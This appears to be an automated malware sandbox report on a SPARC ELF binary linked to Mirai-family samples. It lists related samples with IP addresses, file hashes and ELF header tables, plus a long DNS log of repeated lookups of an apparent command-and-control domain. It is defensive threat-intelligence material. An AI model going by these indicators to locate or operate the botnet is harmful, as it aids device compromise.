                                                    • 211.55.129.167
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 14.86.131.44
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 220.89.51.156
                                                    STATE-OF-MNUSULRmk7oYR7.elfGet hashmaliciousMiraiBrowse
                                                    • 156.142.108.138
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 156.99.154.30
                                                    UZV5A2N5j8.elfGet hashmaliciousMiraiBrowse
                                                    • 156.99.154.48
                                                    tFuSHSz7Fv.elfGet hashmaliciousMiraiBrowse
                                                    • 156.99.154.26
                                                    2LgQzImW3E.elfGet hashmaliciousMiraiBrowse
                                                    • 156.99.154.40
                                                    Hys3ySfAxL.elfGet hashmaliciousMiraiBrowse
                                                    • 156.99.254.154
                                                    SL71PJLYwl.elfGet hashmaliciousUnknownBrowse
                                                    • 151.111.130.184
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 156.98.56.120
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 156.98.56.157
                                                    mpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 156.98.56.154
                                                    ASMediMAQmMz1SXUn8.elfGet hashmaliciousMiraiBrowse
                                                    • 197.153.61.36
                                                    PeleHfdpzX.elfGet hashmaliciousMiraiBrowse
                                                    • 197.247.16.57
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 105.188.238.148
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 197.153.61.32
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 196.121.69.199
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 196.121.69.199
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 196.121.69.199
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 196.121.69.199
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 196.121.69.199
                                                    8kjULT74JI.elfGet hashmaliciousMiraiBrowse
                                                    • 196.126.95.199
                                                    NORIS-NETWORKITServiceProviderlocatedinNuernbergGermYtpxPCS4ke.elfGet hashmaliciousMiraiBrowse
                                                    • 62.137.142.216
                                                    na.elfGet hashmaliciousUnknownBrowse
                                                    • 62.137.189.236
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 62.130.94.11
                                                    jade.m68k.elfGet hashmaliciousMiraiBrowse
                                                    • 62.137.142.235
                                                    sora.mpsl.elfGet hashmaliciousUnknownBrowse
                                                    • 62.130.70.13
                                                    sora.spc.elfGet hashmaliciousUnknownBrowse
                                                    • 213.95.215.172
                                                    E66M3O2493.elfGet hashmaliciousUnknownBrowse
                                                    • 62.136.38.235
                                                    http://www.biogas.orgGet hashmaliciousUnknownBrowse
                                                    • 213.95.86.236
                                                    http://b3-bornim.deGet hashmaliciousUnknownBrowse
                                                    • 213.95.86.236
                                                    xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 213.95.255.97
                                                    No context
                                                    No context
                                                    No created / dropped files found
                                                    File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
                                                    Entropy (8bit):6.192556667557655
                                                    TrID:
                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                    File name:jYEvdBHMOI.elf
                                                    File size:67'240 bytes
                                                    MD5:dd8e5504e1fe35fba03c3186a011f469
                                                    SHA1:3ceb54fff9e8ffdc3015763d38d4468364924488
                                                    SHA256:e708b2fc943bbb9782427435b3a39b7f80d9ef06946792119581c700b8c87d39
                                                    SHA512:34505a29efc19a319bb46964112c6d8df37c5347ccc8a859adf792df6de722872fd6cd9e8ac7f5b21d9479d03f9b25aeda3aabcd8700002fed37ea1ef98fed78
                                                    SSDEEP:1536:bF5vmPu5QqwYrXPIKxo+A0zW+WfFGcT95IQOi336g:p1pBW++Bp5CinF
                                                    TLSH:89634A25B97A2F17C0E1A47A20FB5B54B2E156CE22A4C65E7DB20E8FFF106006503EF5
                                                    File Content Preview:.ELF...........................4.........4. ...(.......................X...X...............\...\...\...|............dt.Q................................@..(....@.;.................#.....`...`.....!....."t..@.....".........`......$"t.."t..@...........`....

                                                    ELF header

                                                    Class:ELF32
                                                    Data:2's complement, big endian
                                                    Version:1 (current)
                                                    Machine:Sparc
                                                    Version Number:0x1
                                                    Type:EXEC (Executable file)
                                                    OS/ABI:UNIX - System V
                                                    ABI Version:0
                                                    Entry Point Address:0x101a4
                                                    Flags:0x0
                                                    ELF Header Size:52
                                                    Program Header Offset:52
                                                    Program Header Size:32
                                                    Number of Program Headers:3
                                                    Section Header Offset:66840
                                                    Section Header Size:40
                                                    Number of Section Headers:10
                                                    Header String Table Index:9
                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                    NULL0x00x00x00x00x0000
                                                    .initPROGBITS0x100940x940x1c0x00x6AX004
                                                    .textPROGBITS0x100b00xb00xec880x00x6AX004
                                                    .finiPROGBITS0x1ed380xed380x140x00x6AX004
                                                    .rodataPROGBITS0x1ed500xed500x15080x00x2A008
                                                    .ctorsPROGBITS0x3025c0x1025c0x80x00x3WA004
                                                    .dtorsPROGBITS0x302640x102640x80x00x3WA004
                                                    .dataPROGBITS0x302700x102700x2680x00x3WA008
                                                    .bssNOBITS0x304d80x104d80x2680x00x3WA008
                                                    .shstrtabSTRTAB0x00x104d80x3e0x00x0001
                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                    LOAD0x00x100000x100000x102580x102586.21380x5R E0x10000.init .text .fini .rodata
                                                    LOAD0x1025c0x3025c0x3025c0x27c0x4e43.69280x6RW 0x10000.ctors .dtors .data .bss
                                                    GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Oct 12, 2024 23:05:02.942101002 CEST192.168.2.148.8.8.80x9b3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:02.953754902 CEST192.168.2.148.8.8.80x9b3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:02.972759962 CEST192.168.2.148.8.8.80x9b3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.004429102 CEST192.168.2.148.8.8.80x9b3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.029273987 CEST192.168.2.148.8.8.80x9b3aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.057055950 CEST192.168.2.148.8.8.80xa29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.068586111 CEST192.168.2.148.8.8.80xa29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.079034090 CEST192.168.2.148.8.8.80xa29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.089739084 CEST192.168.2.148.8.8.80xa29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.100739002 CEST192.168.2.148.8.8.80xa29Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.116616964 CEST192.168.2.148.8.8.80x13d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.138329983 CEST192.168.2.148.8.8.80x13d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.160259008 CEST192.168.2.148.8.8.80x13d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.176263094 CEST192.168.2.148.8.8.80x13d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.195616007 CEST192.168.2.148.8.8.80x13d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.232003927 CEST192.168.2.148.8.8.80xe62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.253634930 CEST192.168.2.148.8.8.80xe62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.283204079 CEST192.168.2.148.8.8.80xe62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.302736998 CEST192.168.2.148.8.8.80xe62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.320017099 CEST192.168.2.148.8.8.80xe62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.355163097 CEST192.168.2.148.8.8.80x912fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.375694990 CEST192.168.2.148.8.8.80x912fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.394424915 CEST192.168.2.148.8.8.80x912fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.419522047 CEST192.168.2.148.8.8.80x912fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.440903902 CEST192.168.2.148.8.8.80x912fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.470355034 CEST192.168.2.148.8.8.80x65c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.497582912 CEST192.168.2.148.8.8.80x65c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.510278940 CEST192.168.2.148.8.8.80x65c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.520314932 CEST192.168.2.148.8.8.80x65c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.534323931 CEST192.168.2.148.8.8.80x65c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.569467068 CEST192.168.2.148.8.8.80x84f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.586680889 CEST192.168.2.148.8.8.80x84f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.606422901 CEST192.168.2.148.8.8.80x84f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.623513937 CEST192.168.2.148.8.8.80x84f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.641629934 CEST192.168.2.148.8.8.80x84f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.679589033 CEST192.168.2.148.8.8.80x607dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.698431015 CEST192.168.2.148.8.8.80x607dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.718173027 CEST192.168.2.148.8.8.80x607dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.735637903 CEST192.168.2.148.8.8.80x607dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.756921053 CEST192.168.2.148.8.8.80x607dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.782340050 CEST192.168.2.148.8.8.80xa8b3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.805473089 CEST192.168.2.148.8.8.80xa8b3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.823522091 CEST192.168.2.148.8.8.80xa8b3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.843516111 CEST192.168.2.148.8.8.80xa8b3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.858333111 CEST192.168.2.148.8.8.80xa8b3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.883426905 CEST192.168.2.148.8.8.80x8f43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.897231102 CEST192.168.2.148.8.8.80x8f43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.919709921 CEST192.168.2.148.8.8.80x8f43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.930486917 CEST192.168.2.148.8.8.80x8f43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.941966057 CEST192.168.2.148.8.8.80x8f43Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.956720114 CEST192.168.2.148.8.8.80xb7f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.968141079 CEST192.168.2.148.8.8.80xb7f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.977787971 CEST192.168.2.148.8.8.80xb7f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.988107920 CEST192.168.2.148.8.8.80xb7f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:03.997704029 CEST192.168.2.148.8.8.80xb7f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.011851072 CEST192.168.2.148.8.8.80xf1bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.021996975 CEST192.168.2.148.8.8.80xf1bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.031768084 CEST192.168.2.148.8.8.80xf1bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.042503119 CEST192.168.2.148.8.8.80xf1bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.051984072 CEST192.168.2.148.8.8.80xf1bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.068979025 CEST192.168.2.148.8.8.80xacb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.078265905 CEST192.168.2.148.8.8.80xacb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.087830067 CEST192.168.2.148.8.8.80xacb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.097052097 CEST192.168.2.148.8.8.80xacb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.106755018 CEST192.168.2.148.8.8.80xacb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.122000933 CEST192.168.2.148.8.8.80x2c90Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.132859945 CEST192.168.2.148.8.8.80x2c90Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.141833067 CEST192.168.2.148.8.8.80x2c90Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.151550055 CEST192.168.2.148.8.8.80x2c90Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.160881996 CEST192.168.2.148.8.8.80x2c90Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.173227072 CEST192.168.2.148.8.8.80x94d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.183510065 CEST192.168.2.148.8.8.80x94d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.192765951 CEST192.168.2.148.8.8.80x94d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.201503992 CEST192.168.2.148.8.8.80x94d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.209599972 CEST192.168.2.148.8.8.80x94d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.219860077 CEST192.168.2.148.8.8.80x1a67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.229434967 CEST192.168.2.148.8.8.80x1a67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.238055944 CEST192.168.2.148.8.8.80x1a67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.247087955 CEST192.168.2.148.8.8.80x1a67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.255161047 CEST192.168.2.148.8.8.80x1a67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.265803099 CEST192.168.2.148.8.8.80x19bcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.274777889 CEST192.168.2.148.8.8.80x19bcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.283792973 CEST192.168.2.148.8.8.80x19bcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.292840958 CEST192.168.2.148.8.8.80x19bcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.302751064 CEST192.168.2.148.8.8.80x19bcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.312794924 CEST192.168.2.148.8.8.80x4309Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.321585894 CEST192.168.2.148.8.8.80x4309Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.330450058 CEST192.168.2.148.8.8.80x4309Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.338660955 CEST192.168.2.148.8.8.80x4309Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.347783089 CEST192.168.2.148.8.8.80x4309Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.358587980 CEST192.168.2.148.8.8.80x4289Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.367094994 CEST192.168.2.148.8.8.80x4289Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.376672029 CEST192.168.2.148.8.8.80x4289Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.387350082 CEST192.168.2.148.8.8.80x4289Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.395371914 CEST192.168.2.148.8.8.80x4289Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.406116962 CEST192.168.2.148.8.8.80x86bcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.415394068 CEST192.168.2.148.8.8.80x86bcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.424164057 CEST192.168.2.148.8.8.80x86bcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.433845043 CEST192.168.2.148.8.8.80x86bcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.442554951 CEST192.168.2.148.8.8.80x86bcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.453424931 CEST192.168.2.148.8.8.80x943dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.461718082 CEST192.168.2.148.8.8.80x943dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.470633984 CEST192.168.2.148.8.8.80x943dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.479918003 CEST192.168.2.148.8.8.80x943dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.488231897 CEST192.168.2.148.8.8.80x943dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.499811888 CEST192.168.2.148.8.8.80x34e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.509084940 CEST192.168.2.148.8.8.80x34e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.517893076 CEST192.168.2.148.8.8.80x34e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.526873112 CEST192.168.2.148.8.8.80x34e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.535394907 CEST192.168.2.148.8.8.80x34e2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.546942949 CEST192.168.2.148.8.8.80x1967Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.555763960 CEST192.168.2.148.8.8.80x1967Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.564857960 CEST192.168.2.148.8.8.80x1967Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.573920012 CEST192.168.2.148.8.8.80x1967Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.582863092 CEST192.168.2.148.8.8.80x1967Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.593585014 CEST192.168.2.148.8.8.80x259dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.602380037 CEST192.168.2.148.8.8.80x259dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.611692905 CEST192.168.2.148.8.8.80x259dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.620281935 CEST192.168.2.148.8.8.80x259dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.628657103 CEST192.168.2.148.8.8.80x259dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.640311003 CEST192.168.2.148.8.8.80x7550Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.650464058 CEST192.168.2.148.8.8.80x7550Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.659529924 CEST192.168.2.148.8.8.80x7550Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.668217897 CEST192.168.2.148.8.8.80x7550Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.677474976 CEST192.168.2.148.8.8.80x7550Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.688322067 CEST192.168.2.148.8.8.80x35e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.697164059 CEST192.168.2.148.8.8.80x35e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.706168890 CEST192.168.2.148.8.8.80x35e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.715467930 CEST192.168.2.148.8.8.80x35e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.724728107 CEST192.168.2.148.8.8.80x35e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.735768080 CEST192.168.2.148.8.8.80x7dc7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.744927883 CEST192.168.2.148.8.8.80x7dc7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.753876925 CEST192.168.2.148.8.8.80x7dc7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.762912989 CEST192.168.2.148.8.8.80x7dc7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.772145987 CEST192.168.2.148.8.8.80x7dc7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.784646034 CEST192.168.2.148.8.8.80x6b37Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.792697906 CEST192.168.2.148.8.8.80x6b37Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.801171064 CEST192.168.2.148.8.8.80x6b37Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.809705019 CEST192.168.2.148.8.8.80x6b37Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.818413019 CEST192.168.2.148.8.8.80x6b37Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.828532934 CEST192.168.2.148.8.8.80x4bf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.838756084 CEST192.168.2.148.8.8.80x4bf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.847256899 CEST192.168.2.148.8.8.80x4bf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.855940104 CEST192.168.2.148.8.8.80x4bf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.864043951 CEST192.168.2.148.8.8.80x4bf3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.875272036 CEST192.168.2.148.8.8.80xf485Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.888351917 CEST192.168.2.148.8.8.80xf485Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.897043943 CEST192.168.2.148.8.8.80xf485Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:04.958587885 CEST192.168.2.148.8.8.80xf485Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.018611908 CEST192.168.2.148.8.8.80xf485Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:05.039524078 CEST192.168.2.148.8.8.80x7e62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
